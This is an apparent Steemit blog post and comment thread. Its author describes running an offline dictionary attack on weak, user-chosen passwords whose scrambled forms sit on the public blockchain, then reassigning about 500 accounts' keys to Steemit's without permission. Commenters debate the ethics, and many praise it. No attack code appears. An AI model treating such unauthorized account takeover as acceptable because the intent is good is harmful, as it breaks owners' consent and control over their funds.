Offline Attack on Steem User Credentials

robinhood (55) in steem • 8 years ago

Moments ago I changed the owner/active/posting/memo keys of ~500 Steem accounts.

I changed their keys to Steemit's key so Steemit can allow these users to regain access via the recovery mechanism they established.

I was able to do this because I was able to guess these account's passwords.

I was able to guess their passwords because of what I would argue is a flaw in Steem's UI. Specifically, it currently allows users-chosen passwords by default. In most applications user-chosen password are not problematic. However, they are problematic in this use-case because a scrambled form of each user's password must be stored on Steem's public blockchain meaning anyone with a copy of the blockchain can mount a large-scale offline dictionary attack to recover them. Research as well as real-world precedent has repeatedly shown that a non-trivial fraction of users are incapable of choosing passwords resistent to offline-attack even when password complexity requirements are enforced.

Forcing machine-generated passwords in the UI for owner/active keys would be one possible step towards mitigation. I'm aware of the usability counter-argument to this suggestion. However, consider that my effort expended ~1 USD of computing resources and ended up recovering the credentials of accounts with liquid assets valued in the thousands and semi-liquid assets (SP) in the tens of thousands. Given this fact, it would be hopelessly naive to assume offline attacks will not be attempted in the future at much greater scale and by totally bad actors.

I invite others with constructive mitigation ideas to share them.

One futher point, unless explicitly invited by Steemit, I will not attempt any future white hat shenanigans. My motivation was to alert this community to a genuine danger and do so in manner that hopefully leaves a more lasting impression than yet another "how to pick a strong password" snorefest post.

steem steemit security passwords

8 years ago by robinhood (55)

$7,754.81

Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!

Sort Order:

Trending

[-]

arhag (67) · 8 years ago

Yup, this is exactly what I have been shouting about for weeks now and expected would eventually happen. I am happy that you are a white hat and didn't take control of the accounts for yourself to profit from.

I believe it is better to push away new users with less user friendly registration (that forces them to use a randomly generated key that they must store securely and use password managers to manage) than to bring them aboard easily only to completely piss them off when their account or funds are stolen [1]. It is our job to make it as user-friendly as possible and to provide great resources educating users how to generate and manage random high-entropy passwords. But I don't agree with compromising their security because it is "too hard" and we don't want to lose them as new users.

[1] Although the new recovery feature allows them to get their account back. Most funds are usually locked in the time-locked Steem Power, so hopefully not too much financial damage would be done by the time they recover their account. And there are plans for a user opt-in and configurable time-locked savings account to even protect their more liquid STEEM and Steem Dollar funds from being stolen by hackers assuming they recover their account in a few days.

$672.94

[-]

cass (69) · 8 years ago

… we are in needs of a bug bounty program with high rewards, that people are happy to publish the flaws, instead of misusing them for the own profit in the short run! Thank you for being honest and alarming the devs and community - and not run with the money …!

Chapeau !

$176.59

[-]

cass (69) · 8 years ago

and tipping is always an option as well - thx again!

$125.78

12 votes

[-]

cass (69) · 8 years ago (edited)

I WILL donate/contribute my rewards gotten out of my comments here @robinhood as well, and you guys here should considering to do this as well...if everybody here WILL doing this i'd double the comment payment amount to donate out of my pockets again!

$124.50

12 votes

[-]

hastla (56) · 8 years ago

@cass - the largest flaw now in my opinion is that overgrowing "tag-spamming" people do. When you have for example in top 12 of "marijuana" topic just 3 related ones the platform has a massive problem. This get worse hour by our and people tag nearly all their posts wrong.

$24.90

5 votes

[-]

hastla (56) · 8 years ago

@wackou - thanks for your upvote... I wrote a article today of the topic. It would be a real interesting thing what a whale (like you) say to the actual situation as you too think tag-spam get a real pain. Would be great to get some words from you:

https://steemit.com/money/@hastla/why-whales-and-dolphins-have-to-start-work-for-steemit-or-lose-their-whole-investment

$0.00

[-]

itsjoeco (56) · 8 years ago

Happy to introduce anyone to Jacob at Cobalt - best bug bounties with a specialization in cryptocurrency companies.

$0.00

[-]

willytrader (1) · 8 years ago

first official STEEM LOTTERY https://steemit.com/lottery/@willytrader/first-official-steem-lottery

$0.00

[-]

ma3 (53) · 8 years ago

This is someting i'm really concerned about arhag, do you have any information i can use at the moment to protect myself further?

$0.04

1 vote

[-]

arhag (67) · 8 years ago

I do actually. I just wrote this post about the importance of using password managers.

$0.65

4 votes

[-]

ma3 (53) · 8 years ago

Thank you arhag, I had a look and have infact been using lastpass, but i've found a few issues it seems to be interfering with things, for example on bittrex it keeps trying to autocomplete the boxes in which I write trade values, so I had to turn it off. do you know any work around for this or perhaps an alternative? cheers.

$0.00

[-]

arhag (67) · 8 years ago (edited)

I don't use LastPass so I can't give you specific instructions. But you should be able to disable its autofill functionality on specific websites that it has trouble with, while still taking advantage of it on nearly every other website. It may also be possible to manually fix the issue specifically for the Bittrex site so that you can even still use autofill on its website without having LastPass autofill in the wrong boxes.

This link may be helpful:
https://lastpass.com/support.php?cmd=getfeaturefaq&feature=feataure_4

$0.00

3 votes

[-]

mranderson (57) · 8 years ago

Amazing work and really making a difference in how we all move forward in the world.

$0.00

1 vote

[-]

steemitpolitics (55) · 8 years ago (edited)

hi @arhag, please check my latest post out. I wrote it to you and the other whales. Maybe you will agree with it :)
https://steemit.com/steemit/@steemitpolitics/6rqxnc-to-the-whales-get-your-head-out-of-your-ass-and-vote-good-content-up-you-are-harming-steemit

$0.00

1 vote

[-]

henchman (29) · 8 years ago

$0.00

1 vote

[-]

liondani (69) · 8 years ago

I will upvote every White Hat hackers post that will help us secure more our platform! And I hope that will give them the motivation to continue working for our security!

$34.66

8 votes

[-]

lukestokes (75) · 8 years ago

Upvoting for visibility (and the Spaceballs reference), but not without much conflict. More people need to understand how serious password security is and the need for a good password manager. At the same time, I don't want to condone grey hat activity.

There were other ways to handle this that would have been true white hat. You could have checked those 500~ passwords, verified them, and then contacted the Steemit team privately. I've been posting in the Slack channel about the need for a private bug bounty program like Bugcrowd for exactly that purpose. There should also be an easy to find ethical disclosure procedure.

In this case, however, was it really Steemit's fault or a PEBKEC (Problem Exists Between Keyboard and Chair)? All attempts at creating idiot proof software fail as better idiots are produced.

I hope you can work with the Steemit team in an ethical manner in the future. I know I'm coming across as judgemental here, and it's possible you actually saved a lot of people from a lot of trouble. It still just feels wrong. Either way, I wouldn't want to get on your bad side. :)

$1.49

5 votes

[-]

billbutler (65) · 8 years ago

I don't fault the OP. This is a classic scenario where you don't fully comprehend the gravity unless it happens. I also like the fact that the OP is being financially compensated for his discovery. I hired my first CTO after he rooted our mail server!

$0.29

1 vote

[-]

lukestokes (75) · 8 years ago

You might be right, Bill. I guess I'm just much more comfortable with white hat activities. We use BugCrowd for FoxyCart and have been very happy with the professionalism and ethics of those involved. When something is exposed (thankfully it's almost always some third party system outside of our PCI environment), it's hard not to take it very seriously. From what I've seen of the team here so far, I think they would have taken a white hat approach seriously also. But... maybe not. As I said, whether or not I like it, this approach may have saved quite a few people from even more frustration.

$0.00

[-]

liondani (69) · 8 years ago (edited)

can you get in touch with me on the slack channel?
(my name there is also liondani)

It is about a steemit user they "lost" his owner key and needs desperately help @tonyson (lost owner key) now he posts under his new account @hien-tran read his post about the "hack" https://steemit.com/steemit/@hien-tran/i-wonder-if-you-could-help-me-with-my-account

co-founder of steemit @ned encouraged him to get in touch with you and that was a great idea in my opinion (I don't know if the reached already to you,his English are poor) I will appreciate it very much if you helped him "recover" his keys.... It is obvious that the funds he has lost are significant for him (he lives with his little Son in Vietnam).... I can Imagine it will change his life if he can have access to his funds! Thanks in advance and please make a post about it so we can tip you for helping a dedicated community member. Thanks

$1.41

1 vote

[-]

robinhood (55) · 8 years ago

Sorry but I can't help this user - I checked my logs and @tonyson was not one of the accounts that I updated.

The accounts I updated had their keys changed to either STM7kyb6WK6Sg9Eu4uu7WGqjYdqJzdBeKEWVDaDEKsgvhvESJZ1vM or STM65wH1LZ7BfSHcK69SShnqCAH5xdoSZpGkUjmzHJ5GCuxEK9V5G which are the owner keys for @steemit and @steemit3 respectively.

$0.00

[-]

ned (69) · 8 years ago

robinhood, can you send me an email ned at steemit dot com

$0.99

7 votes

[-]

robinhood (55) · 8 years ago

Sure. Sent you a message a moment ago. May hit your spam folder since it just said "hi".

$0.38

1 vote

[-]

williambanks (69) · 8 years ago

I can say nothing here except thank you! This really should be the most upvoted topic of the day. Here's an upvote from me!

$0.82

1 vote

[-]

tuck-fheman (74) · 8 years ago

Nice job and thanks!

$0.73

3 votes

[-]

blakemiles84 (67) · 8 years ago

Hm. I vote that you continue to do this and make posts about how you did it, and what recommendations you made.

I promise I will upvote you every time I see it :P

You're the first white hat I've seeing doing these sorts of white hat things in crypto since I got in the game a year ago!

$0.52

1 vote

[-]

fyrstikken (75) · 8 years ago

Thank for a great whitehat hack @robinhood

People need to READ THIS AND TAKE SECURITY SERIOUSLY!!!!

https://steemit.com/steemit/@fyrstikken/steemit-security-exchanges-and-why-by-a-guy-that-has-been-in-crypto-since-2009-new-people-read-this-now

$0.43

3 votes

[-]

oholiab (54) · 8 years ago

That's pretty terrifying, and it's a good job that you posted this... It hadn't occurred that of course hashed passwords are going to be freely available offline because in using a web UI you're used to the assumptions of a traditional web model.

Good on you (assuming you did what you said) for just reassigning back to Steemit. Sounds like we do really need 2FA or generated only passwords... It's a shame that browser tooling around SSL client certs is so user unfriendly, having a client cert as a per-browser alternative to the generated password would be a good way of removing the usability barrier. Users would obviously still have to store their password but they could use the installed client cert for day-to-day auth and just use the password for requesting new certs for new devices.

$0.30

1 vote

[-]

domavila (57) · 8 years ago

This is why I proposed 2FA. I understand 2FA is hard to implement on the blockchain but as the saying goes "when there is a will there is a way". I feel very unsafe on this platform without 2FA. Please read this https://steemit.com/steemit/@domavila/two-factor-authentication-and-why-we-need-it-now

$0.15

6 votes

[-]

cryptogee (75) · 8 years ago

Very interesting, so is this just a problem with user-generated passwords?

Thanks
CG

$0.08

2 votes

[-]

robinhood (55) · 8 years ago

I dug into the code for the "suggest password" option Steem provides at signup and as far as I could tell the logic there was 100% kosher.

$0.68

1 vote

[-]

liondani (69) · 8 years ago

what does that mean? Was it good?

$0.00

[-]

robinhood (55) · 8 years ago

Yes.

100% kosher = Good

$0.00

[-]

kingscrown (81) · 8 years ago

thats a both sided sword. users either wont be able to registr or will loose keys and loose money anyways.

the only way i see is 2FA, still complex but most frienldy from all of this

$0.00

2 votes

[-]

aaseb (49) · 8 years ago

wow! so basically you hacked 500 accounts and gave the keys back to steemit!?
well good job!

$0.00

1 vote

[-]

kingtylervvs (47) · 8 years ago

WHY DON'T WE HAVE GOOGLE AUTHENTICATORS?

$0.00

1 vote

[-]

rdwn (1) · 8 years ago

hopefully leaves a more lasting impression than yet another

$0.00

1 vote

[-]

cyberdesire (49) · 8 years ago

The SpaceBalls is the my favorite movie :)

$0.00

1 vote

[-]

sharingtheworld (46) · 8 years ago

Hopefully steemit will realize this is something of HIGH relevance and importance, since most of the people don't know how to pick passwords (and most of those also use the same password for many identities: mail, facebook, and more). Thanks for your post, very appreciated!

$0.00

1 vote

[-]

nioctib (42) · 8 years ago

upvote back the ones that upvote you

$0.00

1 vote

[-]

sigmajin (65) · 8 years ago (edited)

im actually kind of suprised. When they said that the hacker had private keys, i was thinking he could hashcat them to get passwords... but i figured with 16 characters that would take an unreasonable amount of time.
I figured with a 16 digit password even the weakest passwords would be relatively hard to guess... though i do support 2FA

$0.00

[-]

tosch (56) · 8 years ago

http://keepass.info/

$0.00

[-]

belfordz (38) · 8 years ago

Its a cool concept, but I'm sorry, I call BS.

I have looked at the code that handles hashing, salting and encrypting passwords before they are placed into the block chain and I can say with 99.5% certainty that you did not accomplish the hack you claim to have.

In theory it is possible, but the computational complexity of uncovering even 1 of the passwords from the blockchain would be more difficult that mining the largest amount held by any user on the block chain.

Sorry to hurt your feelings and call you out, but if you are to fool this community you are going to need to prove that you a. have the knowledge required to mount such a large scale offline attack, and b. you would have mentioned the actual difficulty of doing so.

$0.00

[-]

lukestokes (75) · 8 years ago

anyone with a copy of the blockchain can mount a large-scale offline dictionary attack to recover them. Research as well as real-world precedent has repeatedly shown that a non-trivial fraction of users are incapable of choosing passwords resistent to offline-attack even when password complexity requirements are enforced

They didn't claim to crack any hashing algorithm. A dictionary attack simply goes through a dictionary of possible passwords and tries each one until it finds a matching hash. Might want to reconsider that 0.5% chance.

$97.91

4 votes

[-]

bleepcoin (65) · 8 years ago

i changed it now

$0.00

[-]

neowenyuan27 (46) · 8 years ago

Steemit will grow bigger as a community. And with monetary rewards involved, we should expect and, maybe even accept people with different views and beliefs and motives.

From this post, it might just spell the beginning for many exciting things to happen here. Wherever exists blackhats, we just pray hard more whitehats appear. With the increasing popularity, this community will definitely grow, and perhaps its a good sign that @robinhood is here, helping us in his own ways.

Even though, it indeed is wiser to leave the 'bad guys' to the 'cops'(devs), but i guess it doesn't suck if we have a @robinhood around that we can trust, as this community grows.

To the whitehats around!

$0.00

[-]

geronimo (56) · 8 years ago

@robinhood : you are just awesome. I cannot think about how much the steem community and especially the developers need to thank you. You are incredible. Thanks for that.

$0.00

[-]

faddat (66) · 8 years ago

Anyone have a recommended method of machine-generating a password?

$0.00

[-]

eric-boucher (68) · 8 years ago

Thanks a lot for the words of advice. Namaste :)

$0.00

[-]

johnsmith (64) · 8 years ago

Holy crap I'm glad you guys are a lot smarter than I am.

$0.00

[-]

conda (46) · 8 years ago

Up vote for space balls photo

$0.00

[-]

seanmchughart (46) · 8 years ago

Keep up the good work!!

$0.00

[-]

bergy (58) · 8 years ago

Thanks, I guess?

$0.00

[-]

seelemonsonline (42) · 8 years ago

I'm glad you didn't do anything malicious with this great power. Key management when left to the general public is likely dangerous. Hopefully if they lose money once, they'll learn their lesson.

$0.00

[-]

pierregi (34) · 8 years ago

Do the new 32 chars password requirement will prevent any future dictionnary attack ?

$0.00

[-]

rogue91 (47) · 8 years ago

I think this is probably good to get such simple things done during the child life of a crypto less we have a dao scandal on steem in a year. lol

$0.00

[-]

theemperor (33) · 8 years ago

Look at you, so young and carefree :-)

$0.00

[-]

skorss (49) · 8 years ago

great to see someone getting on the topic and doing something about it, this was completely necessary

$0.00

[-]

dony91 (29) · 8 years ago

Amazing work and really making a difference in how we all move forward in the world.

$0.00

[-]

steemitboard (66) · 5 years ago

Congratulations @robinhood! You received a personal award!

Happy Birthday! - You are on the Steem blockchain for 3 years!

_{You can view your badges on your Steem Board and compare to others on the Steem Ranking}

Vote for @Steemitboard as a witness to get one more award and increased upvotes!

$0.00

[-]

papa-pepper (80) · 8 years ago

$0.00

Reveal Comment

[-]

nabilov (55) · 8 years ago

$0.00

Reveal Comment

[-]

sigmajin (65) · 8 years ago

TBH, i think this is a pretty shitty thing to do. It definitely isnt ethical hacking, and one can only hope that the owners pursue legal measures if your claims are true.
I agree with your point.. but i dont think you should be fucking with other peoples money to make it.

$0.00

2 votes

[-]

robinhood (55) · 8 years ago

Sigmajin, based on this comment and your last, I'm not sure you 100% understand the situation.

Regarding your first comment, I'm confused because if you can recover the private key you don't need the password. Also, you are correct in assuming 16 chars can't be brute-forced attacked but it can be dictionary attacked. If it was feasible to brute-force everyone would be screwed.
I didn't take these users money. I re-assigned control of these user's accounts to Steemit which has a mechanism allowing them to establish new (hopefully better) credentials.
I'm curious what you would have regarded as more ethical in this instance? Would doing nothing and watching these users get robbed be as ethical as merely burdening them with the inconvience of being forced to pick a password that can't be trivially guessed?

$135.45

13 votes

[-]

sigmajin (65) · 8 years ago (edited)

OK, i was a little pissy bittrex is fucking with my money.
anyway
1 yeah, i get that the private key obviates the need for the password here... my concern at the time was that after the users got their accounts back, the hacker could take the key, work their way backward to the users password, then use that password to attack other accounts.

2 SO what happens if the value of their assets decreases by 50% while theyre messing around with password recovery?

3 You could have proved your point by contacting tptb with the password list. Or upvoting this post.. or running some kind of script to make them all post horse pornography every few hours until they changed their password.

I know if it happened to me, id be pissed (even though i dont keep a ton of money here)... i guess im not behind it but i realize it was well intentioned.

$0.00

[-]

robinhood (55) · 8 years ago

This is true. However, your point actually unscores another reason why machine-generated passwords are urgently needed. Any steemit user who has used his steemit username/password elsewhere has now given any attacker in the world a means to recover these credentials via offline attack since the steemit blockchain is forever public. I doubt most users appreciated this fact when steemit prompted them to choose a password at signup.
There were very few accounts with significant liquid assets and I wagered they would prefer a recovery delay to getting robbed. IMHO Steem has gotten enough buzz recently that I can guarantee there's a pointy mustached blackhat somewhere silently cursing me for doing this before he had a chance to run the heist script he was working on.
Conspicuously signaling which accounts had weak passwords but not updating their keys would have made it even more trivial for black hats to hijack these accounts since the scrambled passwords in the blockchain are essentially salted (making targeted attacks orders of magnitude more efficient). To your other point, there are several issues with sending an out-of-the-blue email to support@ with a boatload of user creds and an opinionated rant about password UI design; although, originally that was my plan. However, the more I thought about it, the more it seemed likely the current design is a conscious decision that unwisely (especially given point 1) trades off security to optimize signup completion rate and if that's the case a little bit of hand-forcing is useful.

$209.00

14 votes

[-]

robinhood (55) · 8 years ago

Also

I'm not the hacker from 2015-07-14 (I was unclear from your reply if you grasped this). His/her attack vector was totally different.

$0.84

1 vote

[-]

sigmajin (65) · 8 years ago (edited)

yeah, dk if you saw my post pointing it out but i think the 7-14 attack came from @goodgame... the script he was using is still in all of his posts if its him, and the domain it was pinging (steemit.uk) was regged that day. https://steemit.com/doyourpart/@sigmajin/um-this-guy-is-trying-to-do-something-bad-right

$0.00

[-]

deedee (28) · 8 years ago

I'm actually shocked by this. There is really no legal distinction between "white hats" and "black hats". Nobody gave "robinhood" permission to hack 500 Steemit accounts. "robinhood", in fact, did "take the money"... since only "robinhood" now has access to these funds.

$0.00

1 vote

[-]

robinhood (55) · 8 years ago

since only "robinhood" now has access to these funds.

Incorrect, as I stated in my post, I updated these accounts to Steemit's key (not my key) so only Steemit has access to the funds. This fact can be verified by inspecting the blockchain.

$2.25

6 votes